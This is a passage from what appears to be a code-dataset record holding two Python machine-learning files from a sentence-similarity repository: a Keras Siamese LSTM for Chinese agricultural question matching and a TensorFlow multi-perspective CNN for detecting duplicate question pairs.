\"wb\"))\n return tokenizer\n\n\ndef sent2seq(tokenizer, sentences):\n \"\"\"把句子转换成序列,如‘如何 来 防治 水稻 稻瘟病’----->[6, 383, 2, 1, 12]\"\"\"\n sequences = tokenizer.texts_to_sequences(sentences)\n sequences = pad_sequences(sequences, maxlen=MAX_SEQUENCE_LENGTH) # 维度统一为MAX_SEQUENCE_LENGTH,不足的补0\n return sequences\n\n\ndef w2v(tokenizer, nb_words):\n \"\"\"prepare embeddings\"\"\"\n print('Preparing embedding matrix')\n word2vec = Word2Vec.load(EMBEDDING_FILE)\n embedding_matrix = np.zeros((nb_words, EMBEDDING_DIM))\n for word, i in tokenizer.word_index.items():\n if word in word2vec.wv.vocab:\n embedding_matrix[i] = word2vec.wv.word_vec(word)\n else:\n print(word)\n print('Null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\n np.save(embedding_matrix_path, embedding_matrix)\n return embedding_matrix\n\n\ndef get_model(nb_words, embedding_matrix):\n \"\"\"定义模型结构\"\"\"\n embedding_layer = Embedding(nb_words,\n EMBEDDING_DIM,\n weights=[embedding_matrix],\n input_length=MAX_SEQUENCE_LENGTH,\n trainable=False)\n lstm_layer = LSTM(num_lstm, dropout=rate_drop_lstm, recurrent_dropout=rate_drop_lstm)\n\n sequence_1_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32')\n embedded_sequences_1 = embedding_layer(sequence_1_input)\n x1 = lstm_layer(embedded_sequences_1)\n\n sequence_2_input = Input(shape=(MAX_SEQUENCE_LENGTH,), dtype='int32')\n embedded_sequences_2 = embedding_layer(sequence_2_input)\n y1 = lstm_layer(embedded_sequences_2)\n\n merged = concatenate([x1, y1])\n merged = Dropout(rate_drop_dense)(merged)\n merged = BatchNormalization()(merged)\n\n merged = Dense(num_dense, activation=act)(merged)\n merged = Dropout(rate_drop_dense)(merged)\n merged = BatchNormalization()(merged)\n preds = Dense(1, activation='sigmoid')(merged)\n\n model = Model(inputs=[sequence_1_input, sequence_2_input],\n outputs=preds)\n model.compile(loss='binary_crossentropy',\n optimizer='sgd',\n metrics=['acc'])\n model.summary()\n return model\n\n\ndef train_model(model, seq1, seq2, labels):\n \"\"\"训练模型\"\"\"\n early_stopping = EarlyStopping(monitor='val_loss', patience=3)\n bst_model_path = STAMP + '.h5'\n model_checkpoint = ModelCheckpoint(bst_model_path, save_best_only=True, save_weights_only=False)\n\n hist = model.fit([seq1, seq2], labels,\n # validation_data=([test_seq1[:-100], test_seq2[:-100]], test_labels[:-100]),\n validation_split=0.2,\n epochs=100, batch_size=16, shuffle=True, callbacks=[model_checkpoint])\n\n model.load_weights(bst_model_path)\n bst_score = min(hist.history['loss'])\n bst_acc = max(hist.history['acc'])\n print(bst_acc, bst_score)\n print(\"Test score\", min(hist.history[\"val_loss\"]))\n print(\"Test acc\", max(hist.history[\"val_acc\"]))\n print(hist.history['val_loss'])\n print(hist.history['val_acc'])\n\n fig = plt.figure()\n x = range(1, len(hist.history['val_loss'])+1)\n ax1 = fig.add_subplot(111)\n lns1 = ax1.plot(x, hist.history['val_loss'], 'r-', label='损失曲线 Loss curve')\n ax2 = ax1.twinx()\n lns2 = ax2.plot(x, hist.history['val_acc'], '--', label='精度曲线 Accuracy curve')\n lns = lns1 + lns2\n labs = [l.get_label() for l in lns]\n ax1.set_ylabel('损失函数值 Loss function value')\n ax2.set_ylabel('精度 Accuracy')\n ax1.set_ylim(0, 1)\n ax2.set_ylim(0, 1)\n ax1.legend(lns, labs, loc=7)\n ax1.set_xlabel(\"训练轮数 Epochs\")\n plt.savefig('w2v_sgd_-1_b16.png')\n plt.show()\n\n\ndef test(model, test_sentences1, test_sentences2, test_seq1, test_seq2, test_labels):\n predicts = model.predict([test_seq1, test_seq2], batch_size=16, verbose=1)\n print(predicts)\n pres = np.array([1 if p[0]>0.5 else 0 for p in predicts])\n for i in range(len(test_labels)):\n print(\"t1: {}, t2: {}, score: {}, real_sim: {}\".\n format(test_sentences1[i], test_sentences2[i], predicts[i], test_labels[i])\n )\n print(sum(pres==test_labels))\n\n # 画roc曲线\n fpr_lstm, tpr_lstm, thresholds_lstm = roc_curve(test_labels, predicts)\n fpr_gen, tpr_gen, thresholds_gen = roc_curve(test_labels, gen_scores)\n fpr_how, tpr_how, thresholds_how = roc_curve(test_labels, how_scores)\n\n roc_auc_lstm = auc(fpr_lstm, tpr_lstm)\n roc_auc_gen = auc(fpr_gen, tpr_gen)\n roc_auc_how = auc(fpr_how, tpr_how)\n\n plt.plot(fpr_lstm, tpr_lstm, '-', label='本文模型 ROC曲线 ROC of this model')\n plt.plot(fpr_gen, tpr_gen, '-.', label='w2v_cosine ROC曲线 ROC of w2v_cosine')\n plt.plot(fpr_how, tpr_how, ':', label='HowNet ROC曲线 ROC of HowNet')\n\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('真正率 True Positive Rate')\n plt.xlabel('假正率 False Positive Rate')\n plt.legend()\n plt.savefig('roc_auc.png')\n plt.show()\n\n # 画各阈值下的准确率曲线\n thresholds = [i / 100 for i in range(10, 90)]\n p = []\n for thres in thresholds:\n preds = [1 if p[0] > thres else 0 for p in predicts]\n preds = np.array(preds)\n print(thres, sum(preds == test_labels))\n p.append(sum(preds == test_labels))\n print(p)\n\n plt.plot(thresholds, p)\n plt.show()\n\n\ndef evaluate(model, test_seq1, test_seq2, test_labels):\n score = model.evaluate([test_seq1, test_seq2], test_labels, batch_size=10)\n print(score)\n\n\ndef sentence_most_similarity():\n # 计算一个问题与其它问题之间的相似度,找出与其最相似的问题\n data_dict = json.load(open(test_file, encoding='utf-8'))\n num_success = 0\n\n model = load_model('./model/w2v_sgd_b16.h5')\n\n global load_tokenizer\n load_tokenizer = True\n tokenizer = tokenize()\n\n for q in list(data_dict.keys()):\n qs = list(data_dict.keys())\n qs.remove(q)\n tests1 = np.array([q] * len(qs))\n tests2 = np.array(qs)\n test_seq1 = sent2seq(tokenizer, tests1)\n test_seq2 = sent2seq(tokenizer, tests2)\n\n predicts = model.predict([test_seq1, test_seq2], batch_size=16, verbose=1)\n max_inx = np.argmax(predicts, axis=0)[0]\n sort_inx = np.argsort(predicts, axis=0)[::-1]\n print(sort_inx)\n print(max_inx)\n # for i in range(len(tests1)):\n for i in sort_inx[:10]:\n print(\"t1: {}, t2: {}, score: {}\".\n format(tests1[i], tests2[i], predicts[i][0]))\n\n print('\\n' + tests1[max_inx] + ';' + tests2[max_inx] + ';', predicts[max_inx][0])\n\n most_similarity_sentence = tests2[max_inx]\n print('相似问题集:\\n', data_dict[q])\n print('预测结果:\\n', most_similarity_sentence)\n if most_similarity_sentence in data_dict[q]:\n print('预测正确')\n num_success += 1\n print('\\n')\n print(num_success)\n\n\ndef main():\n print('\\n从文件中读取数据..............................')\n sentences1, sentences2, labels = data_prepare(TRAIN_DATA_FILE)\n train_sentences1, train_sentences2, train_labels = sentences1[:-3207], sentences2[:-3207], labels[:-3207]\n test_sentences1, test_sentences2, test_labels = sentences1[-3207:], sentences2[-3207:], labels[-3207:]\n print('Found %s texts in train.csv' % len(sentences1))\n\n sentence_all = np.concatenate((sentences1, sentences2), axis=0)\n\n print('\\n获取所有文本中的词语..........................')\n tokenizer = tokenize(sentence_all)\n # print(tokenizer.word_index)\n # print([tokenizer.word_index[word] for word in ['如何', '来', '防治', '水稻', '稻瘟病']])\n nb_words = min(MAX_NB_WORDS, len(tokenizer.word_index)) + 1\n\n print('\\n把句子转换成序列, 并进行长度补全...............')\n train_seq1 = sent2seq(tokenizer, train_sentences1)\n train_seq2 = sent2seq(tokenizer, train_sentences2)\n test_seq1 = sent2seq(tokenizer, test_sentences1)\n test_seq2 = sent2seq(tokenizer, test_sentences2)\n\n # print('\\n计算每个词语的向量............................')\n # embedding_matrix = w2v(tokenizer, nb_words)\n # # embedding_matrix = np.ones((nb_words, EMBEDDING_DIM)) # bow模型\n #\n # print('\\n设计模型结构..................................')\n # model = get_model(nb_words, embedding_matrix)\n #\n # print('\\n训练模型.....................................')\n # train_model(model, train_seq1, train_seq2, train_labels)\n\n print('\\n测试模型.....................................')\n model = load_model('./model/w2v_sgd_b16.h5')\n test(model, test_sentences1, test_sentences2, test_seq1, test_seq2, test_labels)\n # evaluate(model, test_seq1, test_seq2, test_labels)\n\n\nif __name__ == '__main__':\n # main()\n sentence_most_similarity()\n" }, { "alpha_fraction": 0.5614489912986755, "alphanum_fraction": 0.5852677822113037, "avg_line_length": 34.80340576171875, "blob_id": "c1ec0463577dbc808141b21079a5e2831a8e38e6", "content_id": "5303c9c2bd9cd03f48eb698a0d9d713638f445ec", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23133, "license_type": "permissive", "max_line_length": 151, "num_lines": 646, "path": "/mpcnn/notebook/mp_cnn_main_tensorflow_glove.py", "repo_name": "eric-seekas/sentence_similarity", "src_encoding": "UTF-8", "text": "\nimport nltk\nimport re\nfrom nltk import word_tokenize\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nimport pandas as pd\nimport numpy as np\n\ndataset = pd.read_csv(\"../train.csv\",encoding = 'utf8')\n\n\n\nmaxlen = 30\ndim = 100\nrandom_state =100\n\ndef text_to_wordlist(text, remove_stopwords=False, stem_words=False):\n return text\n\ndataset['question1_n'] = dataset.question1.apply(lambda x :text_to_wordlist(x))\ndataset['question2_n'] = dataset.question2.apply(lambda x :text_to_wordlist(x))\n\ntokenizer = Tokenizer()\n\n\ntokenizer.fit_on_texts(dataset.question1_n.tolist() + dataset.question2_n.tolist())\n\ndataset['question1_seq']= tokenizer.texts_to_sequences(dataset.question1_n)\ndataset['question2_seq']= tokenizer.texts_to_sequences(dataset.question2_n)\n\n\n\nfrom sklearn.model_selection import train_test_split\ntrain_df, test_df = train_test_split(dataset, test_size=0.2, random_state= random_state)\ntest_df, val_df = train_test_split(test_df, test_size=0.5, random_state= random_state)\n\nfrom gensim.models import KeyedVectors\n\nnum_word = len(tokenizer.word_index)\nprint(num_word)\n\n\n\nfrom gensim.models import Word2Vec\nEMBEDDING_FILE = '/media/jlan/E/Projects/nlp/sentence_similarity/dataset/w2v_model.bin'\ndef w2v(tokenizer, nb_words):\n \"\"\"\n prepare embeddings\n :param tokenizer:\n :param nb_words:\n :return:\n \"\"\"\n print('Preparing embedding matrix')\n word2vec = Word2Vec.load(EMBEDDING_FILE)\n embedding_matrix = np.zeros((nb_words, dim))\n embedding_matrix = embedding_matrix.astype(np.float32)\n print(embedding_matrix.dtype)\n for word, i in tokenizer.word_index.items():\n if word in word2vec.wv.vocab:\n embedding_matrix[i] = word2vec.wv.word_vec(word)\n else:\n print(word)\n print('Null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n return embedding_matrix\n\n# glove_dict = loadGloveModel(\"../../glove.6B/glove.6B.300d.txt\")\n\n\nembedding_matrix = w2v(tokenizer, num_word+1)\n\n\nimport tensorflow as tf\nimport time\nimport tensorflow.contrib.layers as layers\n\nmin_temp_result = None\n\ndef create_filter_blockA_weight(n_grams, w_dim, num_kernel):\n weight = tf.Variable(tf.random_normal((n_grams, w_dim, num_kernel),stddev=0.1),name='blockA_W')\n # weight = tf.Variable(tf.ones((n_grams, w_dim, num_kernel)))\n bias = tf.Variable(tf.zeros(num_kernel),name='blockA_b')\n return weight , bias\n\ndef create_filter_blockB_weight(n_grams, w_dim, num_kernel):\n weight = tf.Variable(tf.random_normal((n_grams, 1, 1, num_kernel), stddev=0.1),name='blockB_W')\n # weight = tf.Variable(tf.ones((n_grams, 1, 1, num_kernel)))\n bias = tf.Variable(tf.zeros(num_kernel),name='blockB_b')\n return weight,bias\n\n\ndef create_horizontal_conv(input,sequence_length, kernel_weight, type, min_mask):\n '''\n :param input: N x L x w_dim\n :param kernel_weight: [ window_size, 1, 1, number_kernel]\n :param type:\n :return: N x w_dim x num_kernel\n '''\n with tf.name_scope(\"horizontal_conv\"):\n i0 = tf.constant(0)\n num_kernel = int(kernel_weight[0].get_shape()[-1])\n # result = tf.zeros([0,w_dim, num_kernel])\n\n input = tf.expand_dims(input, 3)\n output = tf.nn.conv2d(input, kernel_weight[0], [1, 1, 1, 1], 'SAME') + kernel_weight[1] # N, height, width, out_kernel\n output = tf.nn.relu(output)\n if type == 'min':\n output = min_pool_operation2d(output,min_mask )\n elif type == 'mean':\n output = mean_pool_operation2d(output,sequence_length)\n elif type == 'max':\n output = tf.reduce_max(output, axis=1) # N, out_kernel\n else:\n raise Exception(\"no such type\")\n\n return output\n\n # result = tf.while_loop(_cond, _run_conv, loop_vars=[i0, result],shape_invariants=[i0.get_shape(), tf.TensorShape([None, w_dim, num_kernel])])\n # return result[1]\n\n\n\ndef create_vertical_conv(input, sequence_length, kernel_weight, type, min_mask):\n '''\n :param input:\n :param sequence_length:\n :param kernel_weight:\n :param type:\n :return: N, num_kernel\n '''\n # num_kernel = 3\n # filter = tf.Variable(tf.ones((2, 4, num_kernel)))\n with tf.name_scope(\"vertical_conv\"):\n num_kernel = int(kernel_weight[0].get_shape()[2])\n # print(input.dtype, kernel_weight[0].dtype)\n output = tf.nn.conv1d(input, kernel_weight[0], 1, 'SAME') + kernel_weight[1] # None, out_width , out_kernel\n output = tf.nn.relu(output)\n\n if type == 'min':\n output = min_pool_operation(output,min_mask )\n elif type == 'mean':\n output = mean_pool_operation(output,sequence_length)\n elif type == 'max':\n output = tf.reduce_max(output, axis=1) # N, out_kernel\n else:\n raise Exception(\"no such type\")\n return output\n\n\n\ndef create_direct_pool(input,num_kernel, type):\n '''\n :param input:\n :param num_kernel:\n :param type:\n :return: N, num_kernel\n '''\n if type == 'min':\n output = tf.tile(tf.expand_dims(tf.reduce_min(tf.reduce_min(input, axis=1), axis=1),axis=1),[1,num_kernel])\n elif type == 'mean':\n output = tf.tile(tf.expand_dims(tf.reduce_mean(tf.reduce_mean(input, axis=1), axis=1),axis=1),[1,num_kernel])\n elif type == 'max':\n output = tf.tile(tf.expand_dims(tf.reduce_max(tf.reduce_max(input, axis=1), axis=1),axis=1),[1,num_kernel])\n else:\n raise Exception(\"no such type\")\n return output\n\n\ndef l2distance(input1,input2):\n l2diff =tf.reduce_sum(tf.square(tf.subtract(input1, input2)),\n axis=1)\n l2diff = tf.clip_by_value(l2diff,0.1,1e7)\n l2diff = tf.sqrt(l2diff)\n return l2diff\n\n\ndef l1distance(input1,input2):\n l1diff = tf.square(tf.subtract(input1, input2))\n l1diff = tf.sqrt(tf.clip_by_value(l1diff,0.1,1e7))\n l1diff = tf.reduce_sum(l1diff, axis=1)\n return l1diff\n\ndef cosine_similarity(input1,input2):\n n_input1 = tf.nn.l2_normalize(input1, dim=1,epsilon=1e-7)\n n_input2 = tf.nn.l2_normalize(input2, dim=1,epsilon=1e-7)\n cosine_sim = tf.reduce_sum(tf.multiply(n_input1, n_input2), axis=1)\n return cosine_sim\n\n\ndef pairwise_distance1(input1, input2):\n '''\n :param input1: N, num_kernel, 1\n :param input2: N, num_kernel, 1\n :return:\n '''\n with tf.name_scope(\"pairwise_distance1\"):\n # return tf.stack([cosine_similarity(input1,input2),l2distance(input1,input2)],axis=1)\n return tf.concat([cosine_similarity(input1,input2),l2distance(input1,input2)],axis=1)\n\n\ndef pairwise_distance2(input1, input2):\n '''\n :param input1: N, num_kernel, 1\n :param input2: N, num_kernel, 1\n :return:\n '''\n with tf.name_scope(\"pairwise_distance2\"):\n # return tf.stack([cosine_similarity(input1,input2),l2distance(input1,input2)],axis=1)\n return tf.concat([cosine_similarity(input1,input2),l2distance(input1,input2)],axis=1)\n\n\ndef get_init_min_mask_value(input_sequence):\n value = np.zeros(shape=(input_sequence.shape[0],maxlen))\n for i, l in enumerate(input_sequence):\n value[i, l:] = 1e7\n return value\n\ndef min_pool_operation(tf_var, min_mask):\n '''\n :param tf_var:\n :param min_mark:\n :return:\n '''\n global min_temp_result\n min_mask = tf.expand_dims(min_mask,axis=2)\n # min_mask = tf.reshape(min_mask, (None,min_mask_mask.shape[0], tf_var.shape[2]))\n temp = tf.add(tf_var, tf.cast(min_mask,tf.float32))\n min_temp_result = temp\n return tf.reduce_min(temp, axis=1)\n\n\ndef mean_pool_operation(tf_var, input_sequence):\n '''\n :param tf_var:\n :param min_mark:\n :return:\n '''\n input_sequence = tf.reshape(input_sequence,[-1,1])\n temp = tf.divide(tf.reduce_sum(tf_var,axis=1), tf.add(tf.cast(input_sequence,tf.float32),1e-7))\n return temp\n\n\ndef min_pool_operation2d(tf_var, min_mask):\n '''\n :param tf_var:\n :param min_mark:\n :return:\n '''\n min_mask = tf.expand_dims(tf.expand_dims(min_mask,2),3)\n min_mask = tf.tile(min_mask,[1,1,int(tf_var.shape[2]),int(tf_var.shape[3])])\n # min_mask = tf.reshape(min_mask, (None,min_mask_mask.shape[0], tf_var.shape[2]))\n temp = tf.add(tf_var, tf.cast(min_mask,tf.float32))\n return tf.reduce_min(temp, axis=1)\n\n\ndef mean_pool_operation2d(tf_var, input_sequence):\n '''\n :param tf_var:\n :param min_mark:\n :return:\n '''\n input_sequence = tf.reshape(input_sequence,[-1,1,1])\n input_sequence = tf.tile(input_sequence,[1,int(tf_var.shape[2]),int(tf_var.shape[3])])\n temp = tf.divide(tf.reduce_sum(tf_var,axis=1), tf.add(tf.cast(input_sequence,tf.float32), 1e-7))\n return temp\n\n\nclass MPCNN:\n\n def __init__(self, maxlen, dim, embedding_weight):\n self.input = tf.placeholder(tf.int32,(None,maxlen),name='input1')\n self.input2 = tf.placeholder(tf.int32,(None,maxlen),name='input2')\n# self.input = tf.placeholder(tf.float32,(None,maxlen, dim),name='input1')\n# self.input2 = tf.placeholder(tf.float32,(None,maxlen, dim),name='input2')\n self.seq_length1 = tf.placeholder(tf.int32,(None),name='seq_len_1')\n self.seq_length2 = tf.placeholder(tf.int32,(None),name='seq_len_2')\n self.min_mask1 = tf.placeholder(tf.int32, (None, maxlen),name='min_mask1')\n self.min_mask2 = tf.placeholder(tf.int32, (None, maxlen),name='min_mask2')\n self.num_kernel_a = 32\n self.num_kernel_b = 32\n self.embedding_weight = tf.Variable(embedding_weight, name=\"E_W\")\n self.y = tf.placeholder(tf.int32, shape=(None,2),name='ans')\n\n input = tf.nn.embedding_lookup(self.embedding_weight, self.input)\n print('hhh', input.dtype)\n input2 = tf.nn.embedding_lookup(self.embedding_weight, self.input2)\n# input = self.input\n# input2 = self.input2\n \n num_kernel_a = self.num_kernel_a\n num_kernel_b = self.num_kernel_b\n seq_length1 = self.seq_length1\n seq_length2 = self.seq_length2\n min_mask1 = self.min_mask1\n min_mask2 = self.min_mask2\n y = self.y\n \n w_dim = dim\n \n n_grams_types = list(range(1,4)) + [-1]\n blockA_type= ['max','mean']\n blockA_weights = {}\n self.blockA_weights = blockA_weights\n regularizers = []\n for n_g in n_grams_types:\n for type in blockA_type:\n if n_g == - 1:\n continue\n t_w = create_filter_blockA_weight(n_g,w_dim, num_kernel_a)\n regularizers.append(tf.nn.l2_loss(t_w[0]))\n blockA_weights[(n_g,type)] = t_w\n\n \n blockA_convs = [{},{}]\n self.blockA_convs = blockA_convs\n for n_g in n_grams_types :\n for type in blockA_type:\n if n_g == -1 :\n blockA_convs[0][(n_g,type)] = create_direct_pool(input,num_kernel_a,type)\n blockA_convs[1][(n_g,type)] = create_direct_pool(input2,num_kernel_a,type)\n else:\n t_w = blockA_weights[(n_g,type)]\n print(input.dtype)\n blockA_convs[0][(n_g,type)] = create_vertical_conv(input,seq_length1,t_w,type, min_mask1)\n blockA_convs[1][(n_g,type)] = create_vertical_conv(input2,seq_length2,t_w,type, min_mask2)\n\n\n #---------- block B ------------------\n blockB_type= ['max','mean']\n blockB_weights = {}\n self.blockA_weights = blockA_weights\n for n_g in n_grams_types:\n for type in blockB_type:\n if n_g == - 1:\n continue\n t_w = create_filter_blockB_weight(n_g,w_dim, num_kernel_b)\n regularizers.append(tf.nn.l2_loss(t_w[0]))\n blockB_weights[(n_g,type)] = t_w\n\n\n blockB_convs = [{},{}]\n self.blockB_convs = blockB_convs\n for n_g in n_grams_types :\n for type in blockB_type:\n if n_g == -1 :\n continue\n else:\n t_w = blockB_weights[(n_g,type)]\n blockB_convs[0][(n_g,type)] = create_horizontal_conv(input,seq_length1,t_w,type,min_mask1)\n blockB_convs[1][(n_g,type)] = create_horizontal_conv(input2,seq_length2,t_w,type,min_mask2)\n\n\n \n outputs = []\n #------------vertical-----comparison -------------\n\n with tf.name_scope(\"vertical_comparison\"):\n vertical_gp1 = []\n vertical_gp2 = []\n for type in blockA_type:\n for n_g1 in n_grams_types:\n o1 = blockA_convs[0][(n_g1, type)]\n for n_g2 in n_grams_types:\n o2 = blockA_convs[1][(n_g2, type)]\n print(n_g1,n_g2, type)\n vertical_gp1.append(o1)\n vertical_gp2.append(o2)\n\n vertical_gp1 = tf.stack(vertical_gp1,axis=2)\n vertical_gp2 = tf.stack(vertical_gp2,axis=2)\n self.temp_gp1 = vertical_gp1\n self.temp_gp2 = vertical_gp2\n o = pairwise_distance1(vertical_gp1, vertical_gp2)\n outputs.append(o)\n\n\n vertical_gp1 = []\n vertical_gp2 = []\n for n_g in n_grams_types:\n if n_g == -1:\n continue\n for type in blockB_type:\n vertical_gp1.append(blockB_convs[0][(n_g, type)])\n vertical_gp2.append(blockB_convs[1][(n_g, type)])\n \n vertical_gp1 = tf.concat(vertical_gp1,axis=2)\n vertical_gp2 = tf.concat(vertical_gp2,axis=2)\n self.temp_gp1 = vertical_gp1\n self.temp_gp2 = vertical_gp2\n o = pairwise_distance1(vertical_gp1, vertical_gp2)\n outputs.append(o)\n \n\n #-----------horizontal----comparison -------------------\n with tf.name_scope(\"horizontal_comparison\"):\n gp1 =[]\n gp2 =[]\n for type in blockA_type:\n # r1 = []\n # r2 = []\n for n_g1 in n_grams_types:\n gp1.append(blockA_convs[0][(n_g1, type)]) # N, num_kernel\n gp2.append(blockA_convs[1][(n_g1, type)]) # N, num_kernel\n \n gp1 = tf.reshape(tf.concat(gp1,axis=1),(-1,len(n_grams_types),num_kernel_a * len(blockA_type)))\n gp2 = tf.reshape(tf.concat(gp2,axis=1),(-1, len(n_grams_types), num_kernel_a * len(blockA_type)))\n o = pairwise_distance2(gp1, gp2)\n outputs.append(o) \n\n self.outputs = outputs\n concat_output = tf.concat(outputs,axis=1)\n self.concat_output = concat_output\n\n# fc_ol = layers.fully_connected(concat_output, 64)\n \n \n \n def create_fc_layer(num_node, prev_input):\n weight = tf.Variable(tf.truncated_normal([int(prev_input.shape[1]), num_node],stddev=0.1),name='fc_W')\n regularizers.append(tf.nn.l2_loss(weight))\n fc_biases_1 = tf.Variable(tf.zeros([num_node]),name='fc_b')\n output = tf.nn.elu(tf.matmul(prev_input,weight) + fc_biases_1)\n return output\n \n prob = tf.placeholder_with_default(1.0, shape=())\n self.prob = prob\n \n concat_output = tf.nn.dropout(concat_output, prob)\n fc_output = create_fc_layer(64, concat_output)\n concat_output = tf.nn.dropout(fc_output, prob)\n output = create_fc_layer(2, fc_output)\n \n \n self.output = output\n\n self.pred = tf.nn.softmax(output,dim=1)\n\n self.total_loss = tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=output)\n self.loss = tf.reduce_mean(self.total_loss)\n total_l2_loss = tf.zeros(1)\n for r in regularizers:\n total_l2_loss += r\n self.loss += 1e-7 * total_l2_loss\n\n acc = tf.reduce_mean(tf.cast(tf.equal(tf.argmax(self.y, 1), tf.argmax(self.output, 1)), tf.float32))\n self.acc = acc\n self.optimizer = tf.train.AdamOptimizer().minimize(self.loss)\n \n self.sess = tf.Session()\n self.init = tf.global_variables_initializer()\n self.sess.run(self.init)\n \n\n\n\nmodel = MPCNN(maxlen,dim,embedding_matrix)\n\n\ndef get_feature_X(df, maxlen):\n x1 = []\n x2 = []\n l1 = []\n l2 = []\n for q1, q2 in zip(df.question1_seq.values, df.question2_seq.values):\n \n x1.append(q1)\n x2.append(q2)\n \n# x1.append([embedding_matrix[t] for t in q1])\n# x2.append([embedding_matrix[t] for t in q2])\n l1.append(len(q1))\n l2.append(len(q2))\n \n return pad_sequences(x1,maxlen,padding='post'), pad_sequences(x2,maxlen,padding='post'), np.array(l1),np.array(l2)\n\n\n\nimport sys\nimport os\nfrom ipywidgets import FloatProgress\nimport time\nfrom IPython.display import display\ndef evaluate (self, df, is_training, batch_size, sess, dropout_prob = 0.2):\n X = get_feature_X(df,maxlen)\n Y = pd.get_dummies(df.is_duplicate)\n sess = self.sess\n start_index = 0\n final_loss = 0\n final_acc = 0\n current_total_trained =0 \n p_bar = FloatProgress()\n display(p_bar)\n start_time = time.time()\n while start_index < X[0].shape[0]:\n temp_x1 = X[0][start_index:start_index+batch_size]\n temp_x2 = X[1][start_index:start_index+batch_size]\n temp_seq_len1 = X[2][start_index:start_index+batch_size]\n temp_seq_len2 = X[3][start_index:start_index+batch_size]\n test_y = Y[start_index:start_index+batch_size]\n\n feed_dict = {\n self.min_mask1: get_init_min_mask_value(temp_seq_len1),\n self.min_mask2: get_init_min_mask_value(temp_seq_len2),\n self.seq_length1: temp_seq_len1,\n self.seq_length2: temp_seq_len2,\n self.input: temp_x1,\n self.input2: temp_x2,\n self.y: test_y\n }\n \n if is_training:\n feed_dict[self.prob] = 1 - dropout_prob\n \n current_total_trained += temp_x1.shape[0]\n\n if is_training:\n # the exact output you're looking for:\n _, c, ac = sess.run([self.optimizer, self.loss, self.acc], feed_dict=feed_dict)\n final_loss += c * temp_x1.shape[0]\n final_acc += ac * temp_x1.shape[0]\n #print(\"%s/%s training loss %s\" % (start_index, X[0].shape[0], final_loss/current_total_trained))\n# sys.stdout.write(\"\\r%s/%s training loss %s\" % (start_index, X[0].shape[0], c))\n# sys.stdout.flush()\n duration = time.time() - start_time\n speed = duration/current_total_trained\n eta = (X[0].shape[0]-current_total_trained)*speed\n p_bar.value = current_total_trained/X[0].shape[0]\n p_bar.description = \"%s/%s, eta %s sec\"%(current_total_trained, X[0].shape[0], eta)\n else:\n c, ac, pred, real = sess.run([self.loss, self.acc, self.output, self.y], feed_dict=feed_dict)\n final_loss += c * temp_x1.shape[0]\n final_acc += ac * temp_x1.shape[0]\n # print('real:', real)\n # print('pred:', pred)\n print(sum(np.argmax(real, axis=1)==np.argmax(pred, axis=1)))\n start_index += batch_size\n \n final_loss = final_loss/X[0].shape[0]\n final_acc = final_acc/X[0].shape[0]\n return final_loss, final_acc\n\ndef gradients(self, df , batch_size, sess):\n X = get_feature_X(df,maxlen)\n Y = pd.get_dummies(df.is_duplicate)\n sess = self.sess\n start_index = 0\n final_loss = 0\n current_total_trained =0 \n p_bar = FloatProgress()\n display(p_bar)\n start_time = time.time()\n while start_index < X[0].shape[0]:\n temp_x1 = X[0][start_index:start_index+batch_size]\n temp_x2 = X[1][start_index:start_index+batch_size]\n temp_seq_len1 = X[2][start_index:start_index+batch_size]\n temp_seq_len2 = X[3][start_index:start_index+batch_size]\n test_y = Y[start_index:start_index+batch_size]\n\n feed_dict = {\n self.min_mask1: get_init_min_mask_value(temp_seq_len1),\n self.min_mask2: get_init_min_mask_value(temp_seq_len2),\n self.seq_length1: temp_seq_len1,\n self.seq_length2: temp_seq_len2,\n self.input: temp_x1,\n self.input2: temp_x2,\n self.y: test_y\n }\n \n \n current_total_trained += temp_x1.shape[0]\n \n var_grad = tf.gradients(self.loss, [self.output])[0]\n \n # the exact output you're looking for:\n g = sess.run([var_grad, self.concat_output], feed_dict=feed_dict)\n print(\"gradient %s\" % (g))\n# sys.stdout.write(\"\\r%s/%s training loss %s\" % (start_index, X[0].shape[0], c))\n# sys.stdout.flush()\n duration = time.time() - start_time\n speed = duration/current_total_trained\n eta = (X[0].shape[0]-current_total_trained)*speed\n p_bar.value = current_total_trained/X[0].shape[0]\n p_bar.description = \"%s/%s, eta %s sec\"%(current_total_trained, X[0].shape[0], eta)\n\n start_index += batch_size\n break\n \n final_loss = final_loss/X[0].shape[0]\n return final_loss\n\n\ndef fit(self, train_df, val_df, epochs, dropout_prob=0.2, batch_size=64, check_point_name=\"./default_cnn_model\"):\n\n sess = self.sess\n \n saver = tf.train.Saver(tf.global_variables ())\n best_epoch = 0\n best_loss = 1e9\n os.mkdir(check_point_name)\n# saver.save(self.sess, check_point_name+'/model', global_step=0)\n for i in range(epochs):\n print(\"training epoch \",i)\n train_loss, train_acc = evaluate(self,train_df,True,batch_size, sess, dropout_prob=dropout_prob)\n print(\"train loss:{}, train acc:{}\".format(train_loss, train_acc))\n loss, acc = evaluate(self, val_df, False, 64, sess)\n print(\"val loss:{}, val acc:{}\".format(loss, acc))\n if loss < best_loss:\n best_epoch = i\n best_loss = loss\n print(\"save best_epoch %s to %s\"%(best_epoch,check_point_name))\n saver.save(self.sess, check_point_name+'/model', global_step=i)\n \n return best_loss\n\nfrom keras.models import load_model\ndef tunning_model(model):\n # dropouts = [0.1, 0.2, 0.3, 0.4, 0.5]\n dropouts = [0.2]\n for d in dropouts:\n print(\"train with dropout %s\"%(d))\n model.sess.run(model.init)\n best_loss = fit(model, train_df, val_df, epochs=5, dropout_prob=d, check_point_name=\"./mpcnn_model_%s\"%(d))\n with open('mpcnn_val_result.txt','a') as f:\n f.write(str({'dropout': d, 'score': best_loss})+\"\\n\")\n \n\n# tunning_model(model)\n#\n#\n# import json\n# for line in open('./mpcnn_val_result.txt','r'):\n# print(line)\n#\n#\n# # dropout 0.2 is best, as loss function = 0.31134441\n#\n#\n# saver = tf.train.Saver()\n#\n# saver.restore(model.sess, './mpcnn_model_0.2/model-2')\n\nimport time\nstart = time.time()\nfor _ in range(10):\n test_loss, test_acc = evaluate(model, test_df, False, 64, model.sess)\n print(test_loss, test_acc)\nprint('run time: 